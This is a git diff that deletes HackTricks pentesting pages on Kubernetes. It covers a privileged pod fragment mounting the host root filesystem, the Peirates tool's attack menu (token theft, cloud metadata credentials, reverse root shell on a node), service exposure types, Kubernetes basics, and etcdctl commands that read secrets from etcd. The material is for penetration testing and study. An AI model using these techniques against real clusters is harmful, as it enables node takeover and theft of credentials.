IfNotPresent - volumeMounts: - - mountPath: /chroot - name: host - securityContext: - privileged: true - volumes: - - name: host - hostPath: - path: / - type: Directory -``` - -## Automatic Tools - -* [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates) - -``` -Peirates v1.1.8-beta by InGuardians - https://www.inguardians.com/peirates ----------------------------------------------------------------- -[+] Service Account Loaded: Pod ns::dashboard-56755cd6c9-n8zt9 -[+] Certificate Authority Certificate: true -[+] Kubernetes API Server: https://10.116.0.1:443 -[+] Current hostname/pod name: dashboard-56755cd6c9-n8zt9 -[+] Current namespace: prd ----------------------------------------------------------------- -Namespaces, Service Accounts and Roles | 
----------------------------------------+ -[1] List, maintain, or switch service account contexts [sa-menu] (try: listsa *, switchsa) -[2] List and/or change namespaces [ns-menu] (try: listns, switchns) -[3] Get list of pods in current namespace [list-pods] -[4] Get complete info on all pods (json) [dump-pod-info] -[5] Check all pods for volume mounts [find-volume-mounts] -[6] Enter AWS IAM credentials manually [enter-aws-credentials] -[7] Attempt to Assume a Different AWS Role [aws-assume-role] -[8] Deactivate assumed AWS role [aws-empty-assumed-role] -[9] Switch authentication contexts: certificate-based authentication (kubelet, kubeproxy, manually-entered) [cert-menu] --------------------------+ -Steal Service Accounts | --------------------------+ -[10] List secrets in this namespace from API server [list-secrets] -[11] Get a service account token from a secret [secret-to-sa] -[12] Request IAM credentials from AWS Metadata API [get-aws-token] * -[13] Request IAM credentials from GCP Metadata API [get-gcp-token] * -[14] Request kube-env from GCP Metadata API [attack-kube-env-gcp] -[15] Pull Kubernetes service account tokens from kops' GCS bucket (Google Cloudonly) [attack-kops-gcs-1] * -[16] Pull Kubernetes service account tokens from kops' S3 bucket (AWS only) [attack-kops-aws-1] ---------------------------------+ -Interrogate/Abuse Cloud API's | ---------------------------------+ -[17] List AWS S3 Buckets accessible (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls] -[18] List contents of an AWS S3 Bucket (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls-objects] ------------+ -Compromise | ------------+ -[20] Gain a reverse rootshell on a node by launching a hostPath-mounting pod [attack-pod-hostpath-mount] -[21] Run command in one or all pods in this namespace via the API Server [exec-via-api] -[22] Run a token-dumping command in all pods via Kubelets (authorization permitting) [exec-via-kubelet] 
--------------+ -Node Attacks | --------------+ -[30] Steal secrets from the node filesystem [nodefs-steal-secrets] ------------------+ -Off-Menu + ------------------+ -[90] Run a kubectl command using the current authorization context [kubectl [arguments]] -[] Run a kubectl command using EVERY authorization context until one works [kubectl-try-all [arguments]] -[91] Make an HTTP request (GET or POST) to a user-specified URL [curl] -[92] Deactivate "auth can-i" checking before attempting actions [set-auth-can-i] -[93] Run a simple all-ports TCP port scan against an IP address [tcpscan] -[94] Enumerate services via DNS [enumerate-dns] * -[] Run a shell command [shell ] - -[exit] Exit Peirates -``` - -## - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md b/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md deleted file mode 100644 index a335dc1b8..000000000 --- a/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md +++ /dev/null @@ -1,212 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -There are **different ways to expose services** in Kubernetes so both **internal** endpoints and **external** endpoints can access them. This Kubernetes configuration is pretty critical as the administrator could give access to **attackers to services they shouldn't be able to access**. - -## Automatic Enumeration - -Before starting enumerating the ways K8s offers tot expose services to the public, know that if you can list namespaces, services and ingresses, you can everything exposed to the public with: - -```bash -kubectl get namespace -o custom-columns='NAME:.metadata.name' | grep -v NAME | while IFS='' read -r ns; do - echo "Namespace: $ns" - kubectl get service -n "$ns" - kubectl get ingress -n "$ns" - echo "==============================================" - echo "" - echo "" -done | grep -v "ClusterIP" -# Remove the last '| grep -v "ClusterIP"' to see also type ClusterIP -``` - -## ClusterIP - -A **ClusterIP** service is the **default** Kubernetes **service**. It gives you a **service inside** your cluster that other apps inside your cluster can access. There is **no external access**. - -However, this can be accessed using the Kubernetes Proxy: - -``` -kubectl proxy --port=8080 -``` - -Now, you can navigate through the Kubernetes API to access services using this scheme: - -`http://localhost:8080/api/v1/proxy/namespaces//services/:/` - -For example you could use the following URL: - -`http://localhost:8080/api/v1/proxy/namespaces/default/services/my-internal-service:http/` - -to access this service: - -```yaml -apiVersion: v1 -kind: Service -metadata: - name: my-internal-service -spec: - selector: - app: my-app - type: ClusterIP - ports: - - name: http - port: 80 - targetPort: 80 - protocol: TCP -``` - -_This method requires you to run `kubectl` as an **authenticated user**._ - -## NodePort - -**NodePort opens a specific port on all the Nodes** (the VMs), and any **traffic** that is sent to this port is **forwarded to the service**. 
This is a really bad option usually. - -![](<../../.gitbook/assets/image (635) (1) (1).png>) - -An example of NodePort specification: - -```yaml -apiVersion: v1 -kind: Service -metadata: - name: my-nodeport-service -spec: - selector: - app: my-app - type: NodePort - ports: - - name: http - port: 80 - targetPort: 80 - nodePort: 30036 - protocol: TCP -``` - -If you **don't specify** the **nodePort** in the yaml (it's the port that will be opened) a port in the **range 30000–32767 will be used**. - -## LoadBalancer - -Exposes the Service externally **using a cloud provider's load balancer**. On GKE, this will spin up a [Network Load Balancer](https://cloud.google.com/compute/docs/load-balancing/network/) that will give you a single IP address that will forward all traffic to your service. - -![](<../../.gitbook/assets/image (654) (1) (1).png>) - -You have to pay for a LoadBalancer per exposed service, which can get expensive. - -## ExternalName - -Services of type ExternalName **map a Service to a DNS name**, not to a typical selector such as `my-service` or `cassandra`. You specify these Services with the `spec.externalName` parameter. - -This Service definition, for example, maps the `my-service` Service in the `prod` namespace to `my.database.example.com`: - -```yaml -apiVersion: v1 -kind: Service -metadata: - name: my-service - namespace: prod -spec: - type: ExternalName - externalName: my.database.example.com -``` - -When looking up the host `my-service.prod.svc.cluster.local`, the cluster DNS Service returns a `CNAME` record with the value `my.database.example.com`. Accessing `my-service` works in the same way as other Services but with the crucial difference that **redirection happens at the DNS level** rather than via proxying or forwarding. - -## External IPs - -Traffic that ingresses into the cluster with the **external IP** (as **destination IP**), on the Service port, will be **routed to one of the Service endpoints**. 
`externalIPs` are not managed by Kubernetes and are the responsibility of the cluster administrator. - -In the Service spec, `externalIPs` can be specified along with any of the `ServiceTypes`. In the example below, "`my-service`" can be accessed by clients on "`80.11.12.10:80`" (`externalIP:port`) - -```yaml -apiVersion: v1 -kind: Service -metadata: - name: my-service -spec: - selector: - app: MyApp - ports: - - name: http - protocol: TCP - port: 80 - targetPort: 9376 - externalIPs: - - 80.11.12.10 -``` - -## Ingress - -Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it sits i**n front of multiple services and act as a β€œsmart router”** or entrypoint into your cluster. - -You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**. - -![](<../../.gitbook/assets/image (653) (1).png>) - -The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service. 
- -The YAML for a Ingress object on GKE with a [L7 HTTP Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) might look like this: - -```yaml -apiVersion: extensions/v1beta1 -kind: Ingress -metadata: - name: my-ingress -spec: - backend: - serviceName: other - servicePort: 8080 - rules: - - host: foo.mydomain.com - http: - paths: - - backend: - serviceName: foo - servicePort: 8080 - - host: mydomain.com - http: - paths: - - path: /bar/* - backend: - serviceName: bar - servicePort: 8080 -``` - -## References - -* [https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0](https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0) -* [https://kubernetes.io/docs/concepts/services-networking/service/](https://kubernetes.io/docs/concepts/services-networking/service/) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/kubernetes-basics.md b/pentesting/pentesting-kubernetes/kubernetes-basics.md deleted file mode 100644 index bf4e028ae..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-basics.md +++ /dev/null @@ -1,597 +0,0 @@ -# Kubernetes Basics - -## Kubernetes Basics - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -**The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)** - -## Architecture & Basics - -### What does Kubernetes do? - -* Allows running container/s in a container engine. -* Schedule allows containers mission efficient. -* Keep containers alive. -* Allows container communications. -* Allows deployment techniques. -* Handle volumes of information. - -### Architecture - -![](https://sickrov.github.io/media/Screenshot-68.jpg) - -* **Node**: operating system with pod or pods. - * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running. - * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service.\ - When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints` - -![](<../../.gitbook/assets/image (467).png>) - -* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods (through API server). The kubelet doesn’t manage containers that were not created by Kubernetes. -* **Kube-proxy**: is the service in charge of the communications (services) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors. 
-* **Sidecar container**: Sidecar containers are the containers that should run along with the main container in the pod. This sidecar pattern extends and enhances the functionality of current containers without changing them. Nowadays, We know that we use container technology to wrap all the dependencies for the application to run anywhere. A container does only one thing and does that thing very well. -* **Master process:** - * **Api Server:** Is the way the users and the pods use to communicate with the master process. Only authenticated request should be allowed. - * **Scheduler**: Scheduling refers to making sure that Pods are matched to Nodes so that Kubelet can run them. It has enough intelligence to decide which node has more available resources the assign the new pod to it. Note that the scheduler doesn't start new pods, it just communicate with the Kubelet process running inside the node, which will launch the new pod. - * **Kube Controller manager**: It checks resources like replica sets or deployments to check if, for example, the correct number of pods or nodes are running. In case a pod is missing, it will communicate with the scheduler to start a new one. It controls replication, tokens, and account services to the API. - * **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...) -* **Cloud controller manager**: Is the specific controller for flow controls and applications, i.e: if you have clusters in AWS or OpenStack. - -Note that as the might be several nodes (running several pods), there might also be several master processes which their access to the Api server load balanced and their etcd synchronized. 
- -**Volumes:** - -When a pod creates data that shouldn't be lost when the pod disappear it should be stored in a physical volume. **Kubernetes allow to attach a volume to a pod to persist the data**. The volume can be in the local machine or in a **remote storage**. If you are running pods in different physical nodes you should use a remote storage so all the pods can access it. - -**Other configurations:** - -* **ConfigMap**: You can configure **URLs** to access services. The pod will obtain data from here to know how to communicate with the rest of the services (pods). Note that this is not the recommended place to save credentials! -* **Secret**: This is the place to **store secret data** like passwords, API keys... encoded in B64. The pod will be able to access this data to use the required credentials. -* **Deployments**: This is where the components to be run by kubernetes are indicated. A user usually won't work directly with pods, pods are abstracted in **ReplicaSets** (number of same pods replicated), which are run via deployments. Note that deployments are for **stateless** applications. The minimum configuration for a deployment is the name and the image to run. -* **StatefulSet**: This component is meant specifically for applications like **databases** which needs to **access the same storage**. -* **Ingress**: This is the configuration that is use to **expose the application publicly with an URL**. Note that this can also be done using external services, but this is the correct way to expose the application. - * If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services. 
- * A better security practice would be to use a cloud load balancer or a proxy server as entrypoint to don't have any part of the Kubernetes cluster exposed. - * When request that doesn't match any ingress rule is received, the ingress controller will direct it to the "**Default backend**". You can `describe` the ingress controller to get the address of this parameter. - * `minikube addons enable ingress` - -### PKI infrastructure - Certificate Authority CA: - -![](https://sickrov.github.io/media/Screenshot-66.jpg) - -* CA is the trusted root for all certificates inside the cluster. -* Allows components to validate to each other. -* All cluster certificates are signed by the CA. -* ETCd has its own certificate. -* types: - * apiserver cert. - * kubelet cert. - * scheduler cert. - -## Basic Actions - -### Minikube - -**Minikube** can be used to perform some **quick tests** on kubernetes without needing to deploy a whole kubernetes environment. It will run the **master and node processes in one machine**. Minikube will use virtualbox to run the node. See [**here how to install it**](https://minikube.sigs.k8s.io/docs/start/). - -``` -$ minikube start -πŸ˜„ minikube v1.19.0 on Ubuntu 20.04 -✨ Automatically selected the virtualbox driver. Other choices: none, ssh -πŸ’Ώ Downloading VM boot image ... - > minikube-v1.19.0.iso.sha256: 65 B / 65 B [-------------] 100.00% ? p/s 0s - > minikube-v1.19.0.iso: 244.49 MiB / 244.49 MiB 100.00% 1.78 MiB p/s 2m17. -πŸ‘ Starting control plane node minikube in cluster minikube -πŸ’Ύ Downloading Kubernetes v1.20.2 preload ... - > preloaded-images-k8s-v10-v1...: 491.71 MiB / 491.71 MiB 100.00% 2.59 MiB -πŸ”₯ Creating virtualbox VM (CPUs=2, Memory=3900MB, Disk=20000MB) ... -🐳 Preparing Kubernetes v1.20.2 on Docker 20.10.4 ... - β–ͺ Generating certificates and keys ... - β–ͺ Booting up control plane ... - β–ͺ Configuring RBAC rules ... -πŸ”Ž Verifying Kubernetes components... 
- β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 -🌟 Enabled addons: storage-provisioner, default-storageclass -πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by defaul - -$ minikube status -host: Running -kubelet: Running -apiserver: Running -kubeconfig: Configured - ----- ONCE YOU HAVE A K8 SERVICE RUNNING WITH AN EXTERNAL SERVICE ----- -$ minikube service mongo-express-service -(This will open your browser to access the service exposed port) - -$ minikube delete -πŸ”₯ Deleting "minikube" in virtualbox ... -πŸ’€ Removed all traces of the "minikube" cluster -``` - -### Kubectl Basics - -**`Kubectl`** is the command line tool fro kubernetes clusters. It communicates with the Api server of the master process to perform actions in kubernetes or to ask for data. - -```bash -kubectl version #Get client and server version -kubectl get pod -kubectl get services -kubectl get deployment -kubectl get replicaset -kubectl get secret -kubectl get all -kubectl get ingress -kubectl get endpoints - -#kubectl create deployment --image= -kubectl create deployment nginx-deployment --image=nginx -#Access the configuration of the deployment and modify it -#kubectl edit deployment -kubectl edit deployment nginx-deployment -#Get the logs of the pod for debbugging (the output of the docker container running) -#kubectl logs -kubectl logs nginx-deployment-84cd76b964 -#kubectl describe pod -kubectl describe pod mongo-depl-5fd6b7d4b4-kkt9q -#kubectl exec -it -- bash -kubectl exec -it mongo-depl-5fd6b7d4b4-kkt9q -- bash -#kubectl describe service -kubectl describe service mongodb-service -#kubectl delete deployment -kubectl delete deployment mongo-depl -#Deploy from config file -kubectl apply -f deployment.yml -``` - -### Minikube Dashboard - -The dashboard allows you to see easier what is minikube running, you can find the URL to access it in: - -``` -minikube dashboard --url - - -πŸ”Œ Enabling dashboard ... 
- β–ͺ Using image kubernetesui/dashboard:v2.3.1 - β–ͺ Using image kubernetesui/metrics-scraper:v1.0.7 -πŸ€” Verifying dashboard health ... -πŸš€ Launching proxy ... -πŸ€” Verifying proxy health ... -http://127.0.0.1:50034/api/v1/namespaces/kubernetes-dashboard/services/http:kubernetes-dashboard:/proxy/ -``` - -### YAML configuration files examples - -Each configuration file has 3 parts: **metadata**, **specification** (what need to be launch), **status** (desired state).\ -Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run: - -![](<../../.gitbook/assets/image (458) (1) (1) (1).png>) - -**Example of Deployment + Service declared in the same configuration file (from** [**here**](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)**)** - -As a service usually is related to one deployment it's possible to declare both in the same configuration file (the service declared in this config is only accessible internally): - -```yaml -apiVersion: apps/v1 -kind: Deployment -metadata: - name: mongodb-deployment - labels: - app: mongodb -spec: - replicas: 1 - selector: - matchLabels: - app: mongodb - template: - metadata: - labels: - app: mongodb - spec: - containers: - - name: mongodb - image: mongo - ports: - - containerPort: 27017 - env: - - name: MONGO_INITDB_ROOT_USERNAME - valueFrom: - secretKeyRef: - name: mongodb-secret - key: mongo-root-username - - name: MONGO_INITDB_ROOT_PASSWORD - valueFrom: - secretKeyRef: - name: mongodb-secret - key: mongo-root-password ---- -apiVersion: v1 -kind: Service -metadata: - name: mongodb-service -spec: - selector: - app: mongodb - ports: - - protocol: TCP - port: 27017 - targetPort: 27017 -``` - -**Example of external service config** - -This service will be accessible externally (check the `nodePort` and `type: LoadBlancer` attributes): - -```yaml ---- -apiVersion: v1 -kind: 
Service -metadata: - name: mongo-express-service -spec: - selector: - app: mongo-express - type: LoadBalancer - ports: - - protocol: TCP - port: 8081 - targetPort: 8081 - nodePort: 30000 -``` - -{% hint style="info" %} -This is useful for testing but for production you should have only internal services and an Ingress to expose the application. -{% endhint %} - -**Example of Ingress config file** - -This will expose the application in `http://dashboard.com`. - -```yaml -apiVersion: networking.k8s.io/v1 -kind: Ingress -metadata: - name: dashboard-ingress - namespace: kubernetes-dashboard -spec: - rules: - - host: dashboard.com - http: - paths: - - backend: - serviceName: kubernetes-dashboard - servicePort: 80 -``` - -**Example of secrets config file** - -Note how the password are encoded in B64 (which isn't secure!) - -```yaml -apiVersion: v1 -kind: Secret -metadata: - name: mongodb-secret -type: Opaque -data: - mongo-root-username: dXNlcm5hbWU= - mongo-root-password: cGFzc3dvcmQ= -``` - -**Example of ConfigMap** - -A **ConfigMap** is the configuration that is given to the pods so they know how to locate and access other services. In this case, each pod will know that the name `mongodb-service` is the address of a pod that they can communicate with (this pod will be executing a mongodb): - -```yaml -apiVersion: v1 -kind: ConfigMap -metadata: - name: mongodb-configmap -data: - database_url: mongodb-service -``` - -Then, inside a **deployment config** this address can be specified in the following way so it's loaded inside the env of the pod: - -```yaml -[...] -spec: - [...] - template: - [...] - spec: - containers: - - name: mongo-express - image: mongo-express - ports: - - containerPort: 8081 - env: - - name: ME_CONFIG_MONGODB_SERVER - valueFrom: - configMapKeyRef: - name: mongodb-configmap - key: database_url -[...] 
-``` - -**Example of volume config** - -You can find different example of storage configuration yaml files in [https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes](https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes).\ -**Note that volumes aren't inside namespaces** - -### Namespaces - -Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. These are intended for use in environments with many users spread across multiple teams, or projects. For clusters with a few to tens of users, you should not need to create or think about namespaces at all. You only should start using namespaces to have a better control and organization of each part of the application deployed in kubernetes. - -Namespaces provide a scope for names. Names of resources need to be unique within a namespace, but not across namespaces. Namespaces cannot be nested inside one another and **each** Kubernetes **resource** can only be **in** **one** **namespace**. - -There are 4 namespaces by default if you are using minikube: - -``` -kubectl get namespace -NAME STATUS AGE -default Active 1d -kube-node-lease Active 1d -kube-public Active 1d -kube-system Active 1d -``` - -* **kube-system**: It's not meant or the users use and you shouldn't touch it. It's for master and kubectl processes. -* **kube-public**: Publicly accessible date. Contains a configmap which contains cluster information -* **kube-node-lease**: Determines the availability of a node -* **default**: The namespace the user will use to create resources - -```bash -#Create namespace -kubectl create namespace my-namespace -``` - -{% hint style="info" %} -Note that most Kubernetes resources (e.g. pods, services, replication controllers, and others) are in some namespaces. 
However, other resources like namespace resources and low-level resources, such as nodes and persistenVolumes are not in a namespace. To see which Kubernetes resources are and aren’t in a namespace: - -```bash -kubectl api-resources --namespaced=true #In a namespace -kubectl api-resources --namespaced=false #Not in a namespace -``` -{% endhint %} - -You can save the namespace for all subsequent kubectl commands in that context. - -```bash -kubectl config set-context --current --namespace= -``` - -### Helm - -Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. - -``` -helm search -``` - -Helm is also a template engine that allows to generate config files with variables: - -![](<../../.gitbook/assets/image (465) (1).png>) - -## Kubernetes secrets - -A **Secret** is an object that **contains sensitive data** such as a password, a token or a key. Such information might otherwise be put in a Pod specification or in an image. Users can create Secrets and the system also creates Secrets. The name of a Secret object must be a valid **DNS subdomain name**. Read here [the official documentation](https://kubernetes.io/docs/concepts/configuration/secret/). - -Secrets might be things like: - -* API, SSH Keys. -* OAuth tokens. -* Credentials, Passwords (plain text or b64 + encryption). -* Information or comments. -* Database connection code, strings… . 
 - -There are different types of secrets in Kubernetes - -| Builtin Type | Usage | -| ----------------------------------- | ----------------------------------------- | -| **Opaque** | **arbitrary user-defined data (Default)** | -| kubernetes.io/service-account-token | service account token | -| kubernetes.io/dockercfg | serialized \~/.dockercfg file | -| kubernetes.io/dockerconfigjson | serialized \~/.docker/config.json file | -| kubernetes.io/basic-auth | credentials for basic authentication | -| kubernetes.io/ssh-auth | credentials for SSH authentication | -| kubernetes.io/tls | data for a TLS client or server | -| bootstrap.kubernetes.io/token | bootstrap token data | - -{% hint style="info" %} -**The Opaque type is the default one, the typical key-value pair defined by users.** -{% endhint %} - -**How secrets works:** - -![](https://sickrov.github.io/media/Screenshot-164.jpg) - -The following configuration file defines a **secret** called `mysecret` with 2 key-value pairs `username: YWRtaW4=` and `password: MWYyZDFlMmU2N2Rm`. It also defines a **pod** called `secretpod` that will have the `username` and `password` defined in `mysecret` exposed in the **environment variables** `SECRET_USERNAME` and `SECRET_PASSWORD`. It will also **mount** the `username` secret inside `mysecret` in the path `/etc/foo/my-group/my-username` with `0640` permissions. 
- -{% code title="secretpod.yaml" %} -```yaml -apiVersion: v1 -kind: Secret -metadata: - name: mysecret -type: Opaque -data: - username: YWRtaW4= - password: MWYyZDFlMmU2N2Rm ---- -apiVersion: v1 -kind: Pod -metadata: - name: secretpod -spec: - containers: - - name: secretpod - image: nginx - env: - - name: SECRET_USERNAME - valueFrom: - secretKeyRef: - name: mysecret - key: username - - name: SECRET_PASSWORD - valueFrom: - secretKeyRef: - name: mysecret - key: password - volumeMounts: - - name: foo - mountPath: "/etc/foo" - restartPolicy: Never - volumes: - - name: foo - secret: - secretName: mysecret - items: - - key: username - path: my-group/my-username - mode: 0640 -``` -{% endcode %} - -```bash -kubectl apply -f -kubectl get pods #Wait until the pod secretpod is running -kubectl exec -it secretpod -- bash -env | grep SECRET && cat /etc/foo/my-group/my-username && echo -``` - -### Secrets in etcd - -**etcd** is a consistent and highly-available **key-value store** used as Kubernetes backing store for all cluster data. Let’s access to the secrets stored in etcd: - -```bash -cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep etcd -``` - -You will see certs, keys and url’s were are located in the FS. Once you get it, you would be able to connect to etcd. 
- -```bash -#ETCDCTL_API=3 etcdctl --cert --key --cacert endpoint=[] health - -ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key /etc/kubernetes/pki/apiserver-etcd-client.key --cacert /etc/kubernetes/pki/etcd/etcd/ca.cert endpoint=[127.0.0.1:1234] health -``` - -Once you achieve establish communication you would be able to get the secrets: - -```bash -#ETCDCTL_API=3 etcdctl --cert --key --cacert endpoint=[] get - -ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key /etc/kubernetes/pki/apiserver-etcd-client.key --cacert /etc/kubernetes/pki/etcd/etcd/ca.cert endpoint=[127.0.0.1:1234] get /registry/secrets/default/secret_02 -``` - -**Adding encryption to the ETCD** - -By default all the secrets are **stored in plain** text inside etcd unless you apply an encryption layer. The following example is based on [https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/) - -{% code title="encryption.yaml" %} -```yaml -apiVersion: apiserver.config.k8s.io/v1 -kind: EncryptionConfiguration -resources: - - resources: - - secrets - providers: - - aescbc: - keys: - - name: key1 - secret: cjjPMcWpTPKhAdieVtd+KhG4NN+N6e3NmBPMXJvbfrY= #Any random key - - identity: {} -``` -{% endcode %} - -After that, you need to set the `--encryption-provider-config` flag on the `kube-apiserver` to point to the location of the created config file. 
You can modify `/etc/kubernetes/manifest/kube-apiserver.yaml` and add the following lines: - -```yaml - containers: - - command: - - kube-apiserver - - --encryption-provider-config=/etc/kubernetes/etcd/ -``` - -Scroll down in the volumeMounts: - -```yaml -- mountPath: /etc/kubernetes/etcd - name: etcd - readOnly: true -``` - -Scroll down in the volumeMounts to hostPath: - -```yaml -- hostPath: - path: /etc/kubernetes/etcd - type: DirectoryOrCreate - name: etcd -``` - -**Verifying that data is encrypted** - -Data is encrypted when written to etcd. After restarting your `kube-apiserver`, any newly created or updated secret should be encrypted when stored. To check, you can use the `etcdctl` command line program to retrieve the contents of your secret. - -1. Create a new secret called `secret1` in the `default` namespace: - - ``` - kubectl create secret generic secret1 -n default --from-literal=mykey=mydata - ``` -2. Using the etcdctl commandline, read that secret out of etcd: - - `ETCDCTL_API=3 etcdctl get /registry/secrets/default/secret1 [...] | hexdump -C` - - where `[...]` must be the additional arguments for connecting to the etcd server. -3. Verify the stored secret is prefixed with `k8s:enc:aescbc:v1:` which indicates the `aescbc` provider has encrypted the resulting data. -4. Verify the secret is correctly decrypted when retrieved via the API: - - ``` - kubectl describe secret secret1 -n default - ``` - - should match `mykey: bXlkYXRh`, mydata is encoded, check [decoding a secret](https://kubernetes.io/docs/concepts/configuration/secret#decoding-a-secret) to completely decode the secret. - -**Since secrets are encrypted on write, performing an update on a secret will encrypt that content:** - -``` -kubectl get secrets --all-namespaces -o json | kubectl replace -f - -``` - -**Final tips:** - -* Try not to keep secrets in the FS, get them from other places. 
